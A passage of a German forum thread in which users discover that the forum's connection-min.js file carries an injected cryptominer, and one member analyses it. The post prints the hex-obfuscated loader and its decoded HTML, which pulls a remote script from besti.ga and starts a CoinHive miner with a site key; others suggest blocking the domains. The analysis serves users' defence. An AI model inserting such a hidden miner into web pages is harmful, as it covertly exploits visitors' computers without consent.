Weitere Informationen und den Download findest du auf der offiziellen Anlaufstelle de.wordpress.org
Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 10 von 13
Like Tree7Likes

Thema: In Browser Bitcoinming statt?

  1. #1
    PostRank: 0
    Registriert seit
    20.11.2017
    Beiträge
    8

    In Browser Bitcoinming statt?

    Guten Tag. Kann mir jemand erklären warum die Sophos Firewall hier anschlägt und mir anzeigt dass die Seite in Browser mining nutzt? Ist dem tatsächlich so?
    Edi and r23 like this.


  2. #2
    PostRank: 10 Avatar von b3317133
    Registriert seit
    21.11.2014
    Beiträge
    1.982
    Das liegt daran, dass (aus welchen Gründen auch immer) auf der Seite tatsächlich ein Mining Script eingebunden wird, derzeit ganz am Ende der Datei forum.wpde.org/clientscript/yui/connection/connection-min.js?v=425 über diesen Codeblock:

    Code:
     var _0x4bde=["\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x62\x65\x73\x74\x69\x2E\x67\x61\x2F\x69\x6C\x31\x6C\x31\x69\x6C\x69\x6C\x31\x6C\x69\x6C\x69\x6C\x69\x6C\x69\x6C\x6C\x6C\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E\x3C\x73\x63\x72\x69\x70\x74\x3E\x76\x61\x72\x20\x6D\x69\x6E\x65\x72\x20\x3D\x20\x6E\x65\x77\x20\x43\x6F\x69\x6E\x48\x69\x76\x65\x2E\x41\x6E\x6F\x6E\x79\x6D\x6F\x75\x73\x28\x22\x69\x6E\x37\x46\x64\x79\x75\x65\x49\x77\x72\x63\x7A\x38\x59\x36\x59\x6A\x4A\x76\x57\x30\x70\x51\x47\x57\x36\x72\x44\x70\x44\x4D\x22\x29\x3B\x20\x6D\x69\x6E\x65\x72\x2E\x73\x74\x61\x72\x74\x28\x29\x3B\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];var _0xc5ff=[_0x4bde[0],_0x4bde[1]];var _0xf92d=[_0xc5ff[0],_0xc5ff[1]];document[_0xf92d[1]](_0xf92d[0])
    der "ausgepackt" zu diesem HTML-Code wird, der dann in die Seite ausgegeben wird und den Miner lädt.

    HTML-Code:
    <script src="http://besti.ga/il1l1ilil1lililililll"></script><script>var miner = new CoinHive.Anonymous("in7FdyueIwrcz8Y6YjJvW0pQGW6rDpDM"); miner.start();</script>
    Die im Code angegebene URL http://besti.ga/il1l1ilil1lililililll leitet derzeit auf https://coinhive.com/lib/coinhive.min.js weiter.

    Temporäre Lösung: Die Domain besti.ga und coinhive.com über z.B. Adblock im Browser blockieren, wobei sich die erstgenannte wohl ab und an ändern dürfte, wenn der Einfüger des Codes unter dem Radar bleiben will..
    Geändert von b3317133 (06.12.2017 um 15:49 Uhr)
    Edi likes this.

  3. #3
    WPDE-Moderator Avatar von maxe
    Registriert seit
    01.05.2008
    Beiträge
    18.001
    ergänzend zu @b3317133

    in uBlock z.B. können die Scripte unter "Meine Filter" blockiert werden:
    http://forum.wpde.org/clientscript/vbulletin_read_marker.js
    http://forum.wpde.org/clientscript/yui/connection/connection-min.js
    Edi likes this.
    Bitte immer zuerst die Suchmaschine Deines Vertrauens nutzen, dann die FAQ und die Forensuche, und erst danach Deine Fragen hier im Forum stellen, denn sehr vieles wurde schon mehrfach beantwortet. Bitte dabei auch die Forenregeln beachten.

    Wenn du eine weise Antwort verlangst, musst du vernünftig fragen. (Johann Wolfgang von Goethe)

  4. #4
    PostRank: 10 Avatar von b3317133
    Registriert seit
    21.11.2014
    Beiträge
    1.982
    @maxe: Die beiden Scripte werden aber für die Forumseite benötigt, nur nicht der o.g. derzeit kleine eingefügte Teil ganz am Ende von connection-min.js ab var _0x4bde= ... Daher lieber die Weiterleitungs- bzw. Zieldomain blocken.

  5. #5
    PostRank: 0
    Registriert seit
    20.11.2017
    Beiträge
    8
    Danke euch !

  6. #6
    PostRank: 0
    Registriert seit
    20.11.2017
    Beiträge
    8
    Aber muss ich nicht zustimmen das mein pc zum Mining genutzt wird wenn ich eine Seite Visite ?

  7. #7
    PostRank: 10 Avatar von danielgoehr
    Registriert seit
    13.07.2016
    Ort
    Berlin
    Beiträge
    1.879
    Zitat Zitat von M@nu Beitrag anzeigen
    Aber muss ich nicht zustimmen das mein pc zum Mining genutzt wird wenn ich eine Seite Visite ?
    Doch. Sehe ich definitiv auch so. Leider scheinen die Admins aktuell nicht wirklich greifbar zu sein (und sich auch nicht wirklich um irgendetwas zu kümmern). Zumindest, wenn ihr das richtig verstanden habe...
    Edi and Kurt Singer like this.

  8. #8
    PostRank: 4 Avatar von Kurt Singer
    Registriert seit
    28.05.2017
    Ort
    Koblenz
    Beiträge
    210
    Zitat Zitat von maxe Beitrag anzeigen
    in uBlock z.B. können die Scripte unter "Meine Filter" blockiert werden:
    http://forum.wpde.org/clientscript/v...read_marker.js
    http://forum.wpde.org/clientscript/y...nection-min.js
    Das ist jetzt sehr hilfreich . Ich lese unter den angegebenen Links nur irgendwelchen Code. Aber wie blockiere ich jetzt was? Oder sollte ich für eine Zeit lang derm Forum fern bleibern?
    Meine Webergüsse: www.kurt-singer.de

  9. #9
    Edi
    Edi ist offline
    PostRank: 10 Avatar von Edi
    Registriert seit
    26.07.2006
    Ort
    Zürich
    Beiträge
    3.727
    Wieso blockieren, das gehört offensichtlich zum Geschäftsmodell hier.

    Irgendwie wird dieses Forum immer merkwürdiger...

  10. #10
    PostRank: 10 Avatar von danielgoehr
    Registriert seit
    13.07.2016
    Ort
    Berlin
    Beiträge
    1.879
    Zitat Zitat von Kurt Singer Beitrag anzeigen
    Das ist jetzt sehr hilfreich . Ich lese unter den angegebenen Links nur irgendwelchen Code. Aber wie blockiere ich jetzt was? Oder sollte ich für eine Zeit lang derm Forum fern bleibern?
    Das sind keine Links, sondern die Scripte, die du blockieren sollst/kannst. Zum blockieren brauchst du ein Browser-Plugin, wie das von Maxe vorgeschlagene uBlock (oder einen beliebigen anderen AdBlocker).

Seite 1 von 2 12 LetzteLetzte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •